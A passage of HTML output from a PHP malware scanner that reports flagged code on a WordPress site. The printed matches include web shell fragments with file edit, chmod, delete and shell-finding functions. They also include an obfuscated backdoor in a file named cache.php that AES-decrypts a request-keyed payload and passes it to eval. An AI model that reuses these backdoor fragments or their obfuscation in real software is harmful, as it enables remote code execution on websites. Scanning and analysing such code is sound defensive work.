</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; } else { if (!</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">0755</span><span style="color: #007700">)) return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; </span><span style="color: #0000BB">$fp </span><span style="color: #007700">= </span><span style="color: #0000BB">fopen </span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #DD0000">"w"</span><span style="color: #007700">); if (</span><span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])) </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color="green"><b>Edited!</b></font>'</span><span style="color: #007700">; else </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color=</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"can not delete!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"ok!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">unzip_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">read_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_folder</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">only_read</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_filename</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void The string of the URL</span><span style="color: #007700">, if </span><span style="color: #0000BB">redirect needed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" gb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" mb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" kb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" b"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_time</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no info"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">perms</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$check</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$perms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<font color=</span><span style="color: #0000BB">$color</span><span style="color: #DD0000">>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$perms</span><span style="color: #007700">.</span><span style="color: #DD0000">"</font>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 512</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">CMS</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Joomla!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WordPress"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Unknown"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">folder_separate</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path2</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">side_bar</span><span style="color: #007700">(</span><span style="color: #0000BB">$make_file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edit_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$files</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">del_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"file not exists"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")"'; $search_str10 = '</span><span style="color: #0000BB">is_uploaded_file</span><span style="color: #DD0000">'; $search_str11 = '</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)) { $arr_php_file = findshells($_SERVER['</span><span style="color: #0000BB">DOCUMENT_</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">arr_php_file </span><span style="color: #007700">= </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 689d8acc <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 689d8acc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'juke'</span><span style="color: #007700">]))
<br />{
<br /> </span><span style="color: #0000BB">$arr_files </span><span style="color: #007700">= </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_18").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/css/dist/dist/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:39</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:39</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_19" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'AV8g3fP8PFEZA+2Bv1T2YWhsSCjXS27pgd/jn//o1e5RXewFG65f/Pvrvs95m2+4XHbjH7wnP+iu/GqfY5X08WsvvtuMNc561jTO6mtns372d4aX/RLe583ubi3c7yHXqAXP0uNejkv14VJHfq7LTkRErvNOz9uarL//9FpHtx/cjZ0okwdMThrEwdNzkzI90f2w5/oTNL6/LW5MEB6FlTLyltw0lvAj1hBej0Lggo0iNHPtUX5/oqy2ab6M10U6PQmxnyF2A7kt/dOAxkScDUghAyBDDHJeGGEaP3slZY5YfFHHuv8/LGrDhMrnLIMQJKCTfci7+ht9mF0T6VvBw/9RrGv5DbO/srT8bHrsVLVp6KzEUCWvHvwdrXd23kQf56974sv0+Wve50evNSn5FEK1oYLoKua+9YUretg+52RhDmXiHiv02MXH/NV9r/0v9OB9DoraStBJAHScTsAVjFU2WWwPxM+MiHxz19DuZn8xUMvukwz...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">HjxX</span><span style="color: #007700">(</span><span style="color: #0000BB">$FLkYh</span><span style="color: #007700">) { </span><span style="color: #0000BB">$NpCK </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$STNk </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$NpCK</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$frJ </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$FLkYh</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$frJ</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$NpCK</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$STNk</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">HjxX</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'Ku+aX9ByZvKzoe7WFOHwy2lpmv/nrmEyW</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$HjxX</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$HjxX</span><span style="color: #007700">))))</span>
</span>
